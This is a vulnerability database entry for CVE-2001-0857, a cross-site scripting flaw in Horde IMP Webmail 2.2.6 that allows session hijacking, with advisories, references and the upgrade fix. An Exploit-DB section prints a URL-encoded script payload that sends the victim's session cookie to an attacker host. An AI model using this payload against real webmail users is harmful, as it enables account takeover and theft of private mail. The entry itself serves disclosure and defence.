CVE-2001-0857
CVSS 7.5
Published: 2001-12-06 00:00:00
Last modified: 2016-10-17 22:12:33

[Original] Cross-site scripting vulnerability in status.php3 in Imp Webmail 2.2.6 and earlier allows remote attackers to gain access to the e-mail of other users by hijacking session cookies via the message parameter.


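[CNNVD] Horde IMP session hijacking vulnerability (CNNVD-200112-060)

        A cross-site scripting (XSS) vulnerability exists in status.php3 in Imp Webmail 2.2.6 and earlier. Remote attackers can gain access to other users' e-mail by hijacking session cookies via the message parameter.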

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

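- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found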

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0857
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0857
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-060
(Official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000437
(UNKNOWN)  CONECTIVA  CLA-2001:437
http://marc.info/?l=bugtraq&m=100535679608486&w=2
(UNKNOWN)  BUGTRAQ  20011109 Imp Webmail session hijacking vulnerability
http://marc.info/?l=bugtraq&m=100540578822469&w=2
(UNKNOWN)  BUGTRAQ  20011110 IMP 2.2.7 (SECURITY) released
http://www.caldera.com/support/security/advisories/CSSA-2001-039.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-039.0
http://www.securityfocus.com/bid/3525
(UNKNOWN)  BID  3525
http://xforce.iss.net/static/7496.php
(UNKNOWN)  XF  imp-css-steal-cookies(7496)

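- Vulnerability information

Horde IMP session hijacking vulnerability
High risk  Cross-site scripting
2001-12-06 00:00:00 2005-05-02 00:00:00
Remote
        A cross-site scripting (XSS) vulnerability exists in status.php3 in Imp Webmail 2.2.6 and earlier. Remote attackers can gain access to other users' e-mail by hijacking session cookies via the message parameter.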

- Advisories and patches

        It has been reported that the devel version of Horde IMP and Horde IMP 3.0 Release Candidate 1 are not vulnerable to this issue.
        It is advised to upgrade to Imp 2.2.7.
        Additional upgrades are available.
        Horde IMP 2.0
        Horde IMP 2.2
        Horde IMP 2.2.1
        Horde IMP 2.2.2
        Horde IMP 2.2.3
        Horde IMP 2.2.4
        Horde IMP 2.2.5
        Horde IMP 2.2.6

- Vulnerability information (21151)

Horde IMP 2.2.x Session Hijacking Vulnerability (EDBID:21151)
linux remote
2001-11-09 Verified
0 Joao Pedro Goncalves
N/A
source: http://www.securityfocus.com/bid/3525/info

IMP is a powerful web-based mail interface/client developed by members of the Horde project.

Encoded HTML tags are not stripped from requests to access 'status.php3'. It is possible for a remote attacker to construct a link which when clicked will cause arbitrary script code to be executed in the browser of an unsuspecting user in the context of a site running Horde IMP.

As a result, it has been proven that this issue can be exploited to steal a legitimate user's cookie-based authentication credentials and gain unauthorized access to that user's webmail account. 

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A 		

- Vulnerability information

668
Horde IMP Webmail status.php3 message Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

Imp Webmail contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'message' variable upon submission to the 'status.php3' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2001-11-09 Unknown
2001-11-09 Unknown

- Solution

Upgrade to version 2.2.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author
